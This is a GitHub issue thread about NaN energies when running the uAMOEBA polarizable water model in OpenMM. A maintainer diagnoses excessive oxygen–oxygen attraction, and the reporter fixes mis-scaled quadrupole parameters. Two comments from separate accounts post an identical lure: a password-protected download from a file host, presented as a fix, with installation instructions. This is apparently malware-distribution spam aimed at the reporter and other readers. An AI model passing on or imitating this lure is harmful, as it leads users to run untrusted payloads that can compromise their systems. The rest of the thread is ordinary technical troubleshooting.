### ISSUE TITLE
uAMOEBA water model meet an error: Energy is NaN

### ISSUE THREAD

**Issue by tanqz-jojo** [openmm/openmm#4631]
Dear OpenMM community:

 I wanted to start running MD simulations using the uAMOEBA water model. I've been running into a problem that NVT simulations are giving me errors where the energy is NaN. And the printed energies were significantly larger.  The OpenMM version was v7.7.0 and v8.1.2.

I doubted the error was about the damping factors. The hydrogen atom in the uAMOEBA water model has no multipoles and vdw parameters. The damping factors = pow(polarity, 1/6), and the damping factors will appear in the denominator to calculate the energy (https://github.com/openmm/openmm/blob/master/plugins/amoeba/platforms/reference/src/SimTKReference/AmoebaReferenceMultipoleForce.cpp).

I've attached the files to reproduce the issue. 
[uamoeba.zip](https://github.com/user-attachments/files/16758252/uamoeba.zip)

Please let me know if you have time to help and if there's anything else I can provide to help with this issue.

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by tanqz-jojo** [comment]
I get a Nan errors when polarizability="1e-9" thole="0.39" of hydrogen atom. 

<Polarize type="381" polarizability="1e-9" thole="0.39" pgrp1="380"/>

If the polarization='direct',  I got another error: Energy is infinite. And it can run some steps with larger energies.

**Comment by peastman** [comment]
It looks to me like your model is unstable due to too much attraction or not enough repulsion between the water oxygens.  To pick just one instances, atoms 9 and 1449 start out 2.8 Å apart, but when you minimize the energy they move to only 1.2 Å apart, leading to huge torques between them.

I'm not sure what the intent of this model is, but comparing it to the standard AMOEBA water model I see some big differences.  The standard one has a negative charge on the oxygens which makes them repel each other.  This model doesn't have that, so you're relying entirely on the vdw term to keep them apart.  In addition, the fixed dipole and quadrupole are an order of magnitude larger than in the standard model.  That creates a lot of additional attraction at short distances (through the interaction between fixed multipoles and induced dipoles).

**Comment by tanqz-jojo** [comment]
I appreciate your suggestion.
The parameters of the uAMOEBA water model were taken from Dr. Pengyu Ren (https://pubs.aip.org/aip/jcp/article/143/1/014504/566971/United-polarizable-multipole-water-model-for).

I reconverted the parameters and realized I forgot to divide the quadrupole parameters by 3. 
Now, I can successfully run MD simulations with this water model.

The new parameters file of the uAMOEBA water model is attached.
[uamoeba-new.zip](https://github.com/user-attachments/files/16775677/uamoeba-new.zip)

**Comment by peastman** [comment]
That would do it!
